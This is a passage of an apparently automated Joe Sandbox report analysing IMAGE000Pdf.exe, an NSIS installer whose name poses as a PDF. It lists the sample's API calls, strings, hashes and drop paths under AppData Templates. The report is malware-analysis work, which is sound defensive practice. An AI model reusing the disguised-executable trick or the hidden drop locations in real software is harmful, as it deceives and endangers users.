String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms$C:\Users\user\Desktop$C:\Users\user\Desktop\IMAGE000Pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-1974407356
Opcode ID: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
Opcode Fuzzy Hash: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E

Function 00405B00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?), ref: 00405B71
lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?), ref: 00405B94
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?), ref: 00405B9A
FindFirstFileW.KERNELBASE(007A3F50,?,?,?,0040A014,?,007A3F50,?), ref: 00405BAA
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405C4A
FindClose.KERNEL32(00000000), ref: 00405C59

Strings

"C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 00405B00
\*.*, xrefs: 00405B6B
P?z, xrefs: 00405B59
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0D

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
API String ID: 2035342205-2074300625
Opcode ID: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
Opcode Fuzzy Hash: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E

Function 0040674C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A4F98,C:\,00405E14,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
FindClose.KERNEL32(00000000), ref: 00406763

Strings

C:\, xrefs: 0040674C

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

Function 00403E6B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
ShowWindow.USER32(?), ref: 00403EC4
DestroyWindow.USER32 ref: 00403ED8
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
GetDlgItem.USER32(?,?), ref: 00403F15
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
IsWindowEnabled.USER32(00000000), ref: 00403F30
GetDlgItem.USER32(?,00000001), ref: 00403FDE
GetDlgItem.USER32(?,00000002), ref: 00403FE8
SetClassLongW.USER32(?,000000F2,?), ref: 00404002
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
GetDlgItem.USER32(?,00000003), ref: 004040F9
ShowWindow.USER32(00000000,?), ref: 0040411A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
EnableWindow.USER32(?,?), ref: 00404147
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
EnableMenuItem.USER32(00000000), ref: 00404164
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
ShowWindow.USER32(?,0000000A), ref: 00404301

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

Function 00403ABD Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810

lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000), ref: 00403B3E
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F93420), ref: 00403BBE
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods), ref: 00403C25

Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342

RegisterClassW.USER32(007A7A00), ref: 00403C62
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
ShowWindow.USER32(00000005,00000000), ref: 00403CE5
GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
RegisterClassW.USER32(007A7A00), ref: 00403D27
DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46

Strings

RichEdit20W, xrefs: 00403D09, 00403D0F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods, xrefs: 00403B4D, 00403B55, 00403BF8, 00403BFE, 00403C0E
RichEd32, xrefs: 00403CF9
_Nb, xrefs: 00403C41, 00403CA9
C:\Users\user\AppData\Local\Temp\, xrefs: 00403AC2
.exe, xrefs: 00403BCB
"C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 00403AC1
RichEdit, xrefs: 00403D18
Control Panel\Desktop\ResourceLocale, xrefs: 00403AF1
1033, xrefs: 00403ADD, 00403B39
Call, xrefs: 00403B85, 00403B8E, 00403B9C, 00403BEB, 00403BF1
RichEd20, xrefs: 00403CEB
.DEFAULT\Control Panel\International, xrefs: 00403B29

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2312106957
Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D

Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403026
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\IMAGE000Pdf.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042

Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4

Strings

"C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 00403015
soft, xrefs: 00403103
Null, xrefs: 0040310C
C:\Users\user\Desktop, xrefs: 00403070, 00403075, 0040307B
C:\Users\user\Desktop\IMAGE000Pdf.exe, xrefs: 0040302C, 0040303B, 0040304F, 0040306F
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
Inst, xrefs: 004030FA
Error launching installer, xrefs: 00403065
C:\Users\user\AppData\Local\Temp\, xrefs: 0040301C

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IMAGE000Pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3763178209
Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D

Function 0040642B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
CoTaskMemFree.OLE32(0079A700), ref: 004065D4
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652

Strings

Call, xrefs: 00406455, 00406530, 00406537, 0040653B, 00406555, 00406556, 0040656B, 0040657E, 0040659A, 004065C5, 004065F9, 004065FF, 0040661B, 0040662E, 0040664B, 00406651, 0040665D, 00406690
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065F4
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040653C

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

Function 00405456 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F923A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F923A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F923A0), ref: 004054B1
SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8

Function 00405925 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
GetLastError.KERNEL32 ref: 0040597C
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
GetLastError.KERNEL32 ref: 0040599B

Strings

C:\Users\user\Desktop, xrefs: 00405925
C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1729097607
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
wsprintfW.USER32 ref: 004067C5
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9

Strings

\, xrefs: 0040679B
